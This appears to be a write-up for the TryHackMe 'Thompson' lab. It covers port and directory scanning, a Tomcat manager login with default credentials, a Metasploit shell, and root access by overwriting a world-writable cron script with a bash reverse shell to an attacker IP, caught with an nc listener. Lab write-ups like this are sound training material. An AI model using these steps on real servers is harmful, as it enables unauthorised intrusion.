Thompson — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Thompson — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opend ports.

nmap -A -T4 -p- -v <ip>

nmap

There’re 3 ports opened: 22(ssh), 8080(http) and 8009(ajp). Let’s access its website via port 8080.

Website

It’s a default Apache website. I’ve checked the page source but nothing valuable. Now I’ll scan for hidden dirs using gobuster

gobuster dir -u http://<ip>:8080 -w /path-to-wordlist

gobuster

There are 2 folders suspicious: /host-manager and /manager

First let’s access /manager

It will prompt for username and password. I haven’t known yet, so I click cancel. And surprisingly, it led me to a default credential:

default credential

Well let’s try again with tomcat:s3cret

/manager

Boom! I’m in. Also try this credential for /host-manager and still successful.

/host-manager

Now I’ll find a way to upload a reverse shell into the webserver and gain access. There are 2 ways to do this: gain a shell directly via metasploit, or use metasploit to generate a .war shell and access via browser.

*Why .war but not .php? Because:

I will use the 1st way.

Start metasploit:

msfdb init && msfconsole

Then search for tomcat exploit:

search tomcat

search msf

Now I found a module to use.

use 17

options

In order to exploit, you need to specify the username and password of tomcat, which is tomcat:s3cret, RHOSTS, which is the machine ip, and RPORT to 8080. And also, change LHOST to your VPN ip.

After everything is set, run

shell

Boom! Now I’ve had the meterpreter shell. Move around and get the first flag in /home/jack

Now let’s get root to get our final flag. Input “shell” to spawn a shell. Then use python to spawn a tty shell.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

tty shell

There is a script called “id.sh”. What it does is that print id command’s result to test.txt. Read the content of test.txt:

test.txt

Now i know that there will be a cronjob. This cronjob will run id.sh as root. So let’s check if I can modify the content of this script.

Yes I can, because its permission is 777! So let’s modify the content of this shell to spawn a shell, and wait for the cronjob to run.

cat > id.sh <<EOF

#!/bin/bash

bash -i >& /dev/tcp/<your-vpn-ip>/<port> 0>&1

EOF

Check the content of id.sh again:

id.sh

Now start a listener on your machine:

nc -lvnp <port>

Wait for about 1 min, I’m root!

root

Get the final flag:

root.txt

The end.

If you want to try the 2nd way, which is generating a .war shell and access via browser, read the content here:

https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/

HAPPY HACKING